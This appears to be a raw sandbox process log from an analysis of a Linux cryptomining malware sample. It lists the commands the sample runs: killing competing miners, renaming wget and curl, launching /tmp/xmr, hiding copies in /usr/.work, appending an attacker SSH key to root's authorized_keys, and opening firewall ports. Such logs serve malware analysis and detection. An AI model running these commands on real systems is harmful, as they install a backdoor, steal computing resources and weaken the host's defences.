work32(进程ID:1057) 命令行:/tmp/work32 work32(进程ID:1064) 命令行:/tmp/work32 -deamon sh(进程ID:1069) 命令行:sh -c ps -ef | grep Circle_MI | grep -v grep | awk '{print $2}' | xargs kill -9 grep(进程ID:1072) 命令行:grep -v grep awk(进程ID:1073) 命令行:awk {print $2} xargs(进程ID:1074) 命令行:xargs kill -9 kill(进程ID:1075) 命令行:kill -9 grep(进程ID:1071) 命令行:grep Circle_MI ps(进程ID:1070) 命令行:ps -ef sh(进程ID:1076) 命令行:sh -c ps -ef | grep kworker34 | grep -v grep | awk '{print $2}' | xargs kill -9 awk(进程ID:1080) 命令行:awk {print $2} grep(进程ID:1079) 命令行:grep -v grep xargs(进程ID:1081) 命令行:xargs kill -9 kill(进程ID:1082) 命令行:kill -9 grep(进程ID:1078) 命令行:grep kworker34 ps(进程ID:1077) 命令行:ps -ef sh(进程ID:1083) 命令行:sh -c ps -ef | grep .daemond | grep -v grep | awk '{print $2}' | xargs kill -9 awk(进程ID:1087) 命令行:awk {print $2} grep(进程ID:1086) 命令行:grep -v grep grep(进程ID:1085) 命令行:grep .daemond ps(进程ID:1084) 命令行:ps -ef xargs(进程ID:1088) 命令行:xargs kill -9 kill(进程ID:1089) 命令行:kill -9 sh(进程ID:1090) 命令行:sh -c ps -ef | grep /tmp/thisxxs | grep -v grep | awk '{print $2}' | xargs kill -9 xargs(进程ID:1095) 命令行:xargs kill -9 kill(进程ID:1096) 命令行:kill -9 grep(进程ID:1092) 命令行:grep /tmp/thisxxs grep(进程ID:1093) 命令行:grep -v grep awk(进程ID:1094) 命令行:awk {print $2} ps(进程ID:1091) 命令行:ps -ef sh(进程ID:1097) 命令行:sh -c ps -ef | grep /opt/yilu/work/xig/xig | grep -v grep | awk '{print $2}' | xargs kill -9 ps(进程ID:1098) 命令行:ps -ef grep(进程ID:1100) 命令行:grep -v grep awk(进程ID:1101) 命令行:awk {print $2} grep(进程ID:1099) 命令行:grep /opt/yilu/work/xig/xig xargs(进程ID:1102) 命令行:xargs kill -9 kill(进程ID:1103) 命令行:kill -9 sh(进程ID:1104) 命令行:sh -c ps -ef | grep /opt/yilu/mservice | grep -v grep | awk '{print $2}' | xargs kill -9 awk(进程ID:1108) 命令行:awk {print $2} grep(进程ID:1107) 命令行:grep -v grep xargs(进程ID:1109) 命令行:xargs kill -9 kill(进程ID:1110) 命令行:kill -9 grep(进程ID:1106) 命令行:grep /opt/yilu/mservice ps(进程ID:1105) 命令行:ps -ef sh(进程ID:1111) 命令行:sh -c ps -ef | grep /usr/bin/.sshd | grep -v grep | awk '{print $2}' | xargs kill -9 awk(进程ID:1115) 命令行:awk {print $2} xargs(进程ID:1116) 命令行:xargs kill -9 kill(进程ID:1117) 命令行:kill -9 grep(进程ID:1114) 命令行:grep -v grep grep(进程ID:1113) 命令行:grep /usr/bin/.sshd ps(进程ID:1112) 命令行:ps -ef sh(进程ID:1118) 命令行:sh -c ps -ef | grep /usr/bin/bsd-port/getty | grep -v grep | awk '{print $2}' | xargs kill -9 awk(进程ID:1122) 命令行:awk {print $2} xargs(进程ID:1123) 命令行:xargs kill -9 kill(进程ID:1124) 命令行:kill -9 grep(进程ID:1121) 命令行:grep -v grep grep(进程ID:1120) 命令行:grep /usr/bin/bsd-port/getty ps(进程ID:1119) 命令行:ps -ef sh(进程ID:1125) 命令行:sh -c ps -ef | grep x86_ | grep -v grep | awk '{print $2}' | xargs kill -9 awk(进程ID:1129) 命令行:awk {print $2} grep(进程ID:1128) 命令行:grep -v grep xargs(进程ID:1130) 命令行:xargs kill -9 kill(进程ID:1131) 命令行:kill -9 grep(进程ID:1127) 命令行:grep x86_ ps(进程ID:1126) 命令行:ps -ef sh(进程ID:1132) 命令行:sh -c ps -ef | grep cryptonight | grep -v grep | awk '{print $2}' | xargs kill -9 xargs(进程ID:1137) 命令行:xargs kill -9 kill(进程ID:1150) 命令行:kill -9 awk(进程ID:1136) 命令行:awk {print $2} grep(进程ID:1135) 命令行:grep -v grep grep(进程ID:1134) 命令行:grep cryptonight ps(进程ID:1133) 命令行:ps -ef sh(进程ID:1151) 命令行:sh -c ps -ef | grep ddg | grep -v grep | awk '{print $2}' | xargs kill -9 xargs(进程ID:1156) 命令行:xargs kill -9 kill(进程ID:1157) 命令行:kill -9 awk(进程ID:1155) 命令行:awk {print $2} grep(进程ID:1154) 命令行:grep -v grep grep(进程ID:1153) 命令行:grep ddg ps(进程ID:1152) 命令行:ps -ef sh(进程ID:1158) 命令行:sh -c ps -ef | grep prohash | grep -v grep | awk '{print $2}' | xargs kill -9 xargs(进程ID:1163) 命令行:xargs kill -9 kill(进程ID:1164) 命令行:kill -9 awk(进程ID:1162) 命令行:awk {print $2} grep(进程ID:1161) 命令行:grep -v grep grep(进程ID:1160) 命令行:grep prohash ps(进程ID:1159) 命令行:ps -ef sh(进程ID:1165) 命令行:sh -c ps -ef | grep monero | grep -v grep | awk '{print $2}' | xargs kill -9 xargs(进程ID:1170) 命令行:xargs kill -9 kill(进程ID:1171) 命令行:kill -9 awk(进程ID:1169) 命令行:awk {print $2} grep(进程ID:1168) 命令行:grep -v grep grep(进程ID:1167) 命令行:grep monero ps(进程ID:1166) 命令行:ps -ef sh(进程ID:1172) 命令行:sh -c ps -ef | grep xmr | grep -v grep | awk '{print $2}' | xargs kill -9 xargs(进程ID:1177) 命令行:xargs kill -9 kill(进程ID:1178) 命令行:kill -9 awk(进程ID:1176) 命令行:awk {print $2} grep(进程ID:1175) 命令行:grep -v grep grep(进程ID:1174) 命令行:grep xmr ps(进程ID:1173) 命令行:ps -ef sh(进程ID:1179) 命令行:sh -c ps -ef | grep miner | grep -v grep | awk '{print $2}' | xargs kill -9 xargs(进程ID:1184) 命令行:xargs kill -9 kill(进程ID:1185) 命令行:kill -9 awk(进程ID:1183) 命令行:awk {print $2} grep(进程ID:1182) 命令行:grep -v grep grep(进程ID:1181) 命令行:grep miner ps(进程ID:1180) 命令行:ps -ef sh(进程ID:1186) 命令行:sh -c ps -ef | grep pool. | grep -v grep | awk '{print $2}' | xargs kill -9 xargs(进程ID:1191) 命令行:xargs kill -9 kill(进程ID:1192) 命令行:kill -9 awk(进程ID:1190) 命令行:awk {print $2} grep(进程ID:1189) 命令行:grep -v grep grep(进程ID:1188) 命令行:grep pool. ps(进程ID:1187) 命令行:ps -ef sh(进程ID:1193) 命令行:sh -c ps -ef | grep tcp: | grep -v grep | awk '{print $2}' | xargs kill -9 xargs(进程ID:1198) 命令行:xargs kill -9 kill(进程ID:1199) 命令行:kill -9 awk(进程ID:1197) 命令行:awk {print $2} grep(进程ID:1196) 命令行:grep -v grep grep(进程ID:1195) 命令行:grep tcp: ps(进程ID:1194) 命令行:ps -ef sh(进程ID:1200) 命令行:sh -c ps -ef | grep stratum | grep -v grep | awk '{print $2}' | xargs kill -9 xargs(进程ID:1205) 命令行:xargs kill -9 kill(进程ID:1206) 命令行:kill -9 awk(进程ID:1204) 命令行:awk {print $2} grep(进程ID:1203) 命令行:grep -v grep grep(进程ID:1202) 命令行:grep stratum ps(进程ID:1201) 命令行:ps -ef sh(进程ID:1207) 命令行:sh -c killall xmr killall(进程ID:1208) 命令行:killall xmr sh(进程ID:1209) 命令行:sh -c mv /usr/bin/wget /usr/bin/wget1& mv(进程ID:1210) 命令行:mv /usr/bin/wget /usr/bin/wget1 sh(进程ID:1211) 命令行:sh -c mv /usr/bin/curl /usr/bin/curl1& mv(进程ID:1212) 命令行:mv /usr/bin/curl /usr/bin/curl1 sh(进程ID:1213) 命令行:sh -c chmod +x /tmp/xmr chmod(进程ID:1214) 命令行:chmod +x /tmp/xmr sh(进程ID:1215) 命令行:sh -c /tmp/xmr xmr(进程ID:1216) 命令行:/tmp/xmr xmr(进程ID:1217) 命令行:/tmp/xmr sh(进程ID:1218) 命令行:sh -c chmod +x /tmp/secure.sh chmod(进程ID:1224) 命令行:chmod +x /tmp/secure.sh sh(进程ID:1225) 命令行:sh -c /tmp/secure.sh& secure.sh(进程ID:1226) 命令行:/bin/bash /tmp/secure.sh date(进程ID:1231) 命令行:date +%b %e %H secure.sh(进程ID:1233) 命令行:/bin/bash /tmp/secure.sh uniq(进程ID:1240) 命令行:uniq -c awk(进程ID:1241) 命令行:awk $1>"$LIMIT"{print $1":"$2} sort(进程ID:1239) 命令行:sort awk(进程ID:1238) 命令行:awk {print $(NF-3)} grep(进程ID:1237) 命令行:grep Failed grep(进程ID:1236) 命令行:grep Aug 13 14 /var/log/secure sleep(进程ID:1246) 命令行:sleep 60 sh(进程ID:1227) 命令行:sh -c chmod +x /tmp/auth.sh chmod(进程ID:1228) 命令行:chmod +x /tmp/auth.sh sh(进程ID:1232) 命令行:sh -c /tmp/auth.sh& auth.sh(进程ID:1234) 命令行:/bin/bash /tmp/auth.sh date(进程ID:1243) 命令行:date +%b %e %H auth.sh(进程ID:1245) 命令行:/bin/bash /tmp/auth.sh grep(进程ID:1250) 命令行:grep Failed awk(进程ID:1251) 命令行:awk {print $(NF-3)} sort(进程ID:1252) 命令行:sort grep(进程ID:1249) 命令行:grep Aug 13 14 /var/log/auth.log awk(进程ID:1254) 命令行:awk $1>"$LIMIT"{print $1":"$2} uniq(进程ID:1253) 命令行:uniq -c sleep(进程ID:1259) 命令行:sleep 60 sh(进程ID:1235) 命令行:sh -c mkdir -p /usr/.work mkdir(进程ID:1242) 命令行:mkdir -p /usr/.work sh(进程ID:1244) 命令行:sh -c \cp -R /tmp/* /usr/.work/ & cp(进程ID:1247) 命令行:cp -R /tmp/auth.sh /tmp/config.json /tmp/qJUGsSAUwc /tmp/secure.sh /tmp/systemd-private-2d178a502bb5441c8ddb372911cadad5-systemd-hostnamed.service-oULH8V /tmp/systemd-private-2d178a502bb5441c8ddb372911cadad5-systemd-resolved.service-YPxmpS /tmp/work32 /tmp/xmr /usr/.work/ sh(进程ID:1248) 命令行:sh -c chmod 700 /root/.ssh/ chmod(进程ID:1255) 命令行:chmod 700 /root/.ssh/ sh(进程ID:1256) 命令行:sh -c echo >> /root/.ssh/authorized_keys sh(进程ID:1258) 命令行:sh -c chmod 600 /root/.ssh/authorized_keys chmod(进程ID:1260) 命令行:chmod 600 /root/.ssh/authorized_keys sh(进程ID:1261) 命令行:sh -c echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc3BlbiQaznPT8TScrs9YIzmrpI9Lpa4LtCjB5z0LuQ4o6XwvzomxAixn2F1jaUl175Cxcg3PmUsPOLE+WeWicKqL2YZ46SotjZgnS6JjXpuZVi7V0DSiXu0itlwWDC9m8huBvUBSIsDCsgb9OeG6rlrCyZgTW+qZciK+KZ8rwlFp3CFyxoF2122ueOnl5pAUCy1iHqGun03dMdUxA1d3KnxSZ3NQrYiH69dc8/YhV4SriOW9psc0pv9KeBLF0OXHtEAdbnSlwfk2uTjjBMK0nDidl7wS52Ygi/H4+P+4EXkSzf4Jj4/L6P3c5rLC3/l3RFdo1T7EQ8fH6NsTYJNZ7 root@u911" >> /root/.ssh/authorized_keys sh(进程ID:1262) 命令行:sh -c iptables -I INPUT -p tcp --dport 8012 -j ACCEPT iptables(进程ID:1263) 命令行:iptables -I INPUT -p tcp --dport 8012 -j ACCEPT sh(进程ID:1268) 命令行:sh -c iptables -I OUTPUT -p tcp --sport 8012 -j ACCEPT iptables(进程ID:1269) 命令行:iptables -I OUTPUT -p tcp --sport 8012 -j ACCEPT sh(进程ID:1270) 命令行:sh -c iptables -I PREROUTING -t nat -p tcp --dport 8012 -j ACCEPT iptables(进程ID:1271) 命令行:iptables -I PREROUTING -t nat -p tcp --dport 8012 -j ACCEPT sh(进程ID:1281) 命令行:sh -c iptables -I POSTROUTING -t nat -p tcp --sport 8012 -j ACCEPT iptables(进程ID:1282) 命令行:iptables -I POSTROUTING -t nat -p tcp --sport 8012 -j ACCEPT sh(进程ID:1283) 命令行:sh -c iptables -I INPUT -p udp --dport 48798 -j ACCEPT iptables(进程ID:1286) 命令行:iptables -I INPUT -p udp --dport 48798 -j ACCEPT sh(进程ID:1288) 命令行:sh -c iptables -I OUTPUT -p udp --sport 48798 -j ACCEPT iptables(进程ID:1290) 命令行:iptables -I OUTPUT -p udp --sport 48798 -j ACCEPT sh(进程ID:1294) 命令行:sh -c iptables -I PREROUTING -t nat -p udp --dport 48798 -j ACCEPT iptables(进程ID:1296) 命令行:iptables -I PREROUTING -t nat -p udp --dport 48798 -j ACCEPT sh(进程ID:1297) 命令行:sh -c iptables -I POSTROUTING -t nat -p udp --sport 48798 -j ACCEPT iptables(进程ID:1298) 命令行:iptables -I POSTROUTING -t nat -p udp --sport 48798 -j ACCEPT sh(进程ID:1284) 命令行:sh -c ulimit -n